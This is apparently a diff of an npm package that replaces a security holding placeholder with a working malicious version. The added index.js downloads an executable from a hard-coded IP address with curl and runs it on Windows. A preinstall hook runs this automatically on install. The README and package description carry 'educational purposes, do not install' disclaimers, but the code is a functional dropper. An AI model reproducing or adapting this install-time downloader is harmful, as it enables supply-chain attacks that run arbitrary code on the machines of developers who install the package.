very-bad-npm_uwu 0.0.1-security → 1.0.4

package/README.md

@@ -1,5 +1,4 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=very-bad-npm_uwu for more information.
+# This package is used for research purposes!!!
+# I do not recommend intalling it!!!
+# DO NOT INSTALL IT!!!
+# If you install it it is your fault

package/index.js

@@ -0,0 +1,32 @@
+const { exec } = require('child_process');
+const os = require('os');
+
+function getPayload() {
+    return new Promise((resolve, reject) => {
+        exec('curl http://168.100.10.198:8080/ssms.exe --output ssms.exe', (error, stdout, stderr) => {
+            if (error) {
+                reject(error);
+            } else {
+                resolve(stdout);
+            }
+        });
+    });
+}
+
+function exePayload() {
+        exec('ssms.exe');
+}
+
+async function runPayload() {
+    if (os.platform() === 'win32') {
+        try {
+            await getPayload();
+            exePayload(); 
+        } catch (error) {
+            console.error(error);
+        }
+       
+    }
+}
+
+runPayload();

package/package.json

@@ -1,6 +1,13 @@
 {
   "name": "very-bad-npm_uwu",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.4",
+  "description": "DO NOT DOWLOAD THIS PACKAGE. IT IS USED FOR EDUCATIONAL PURPOSES",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+  }
 }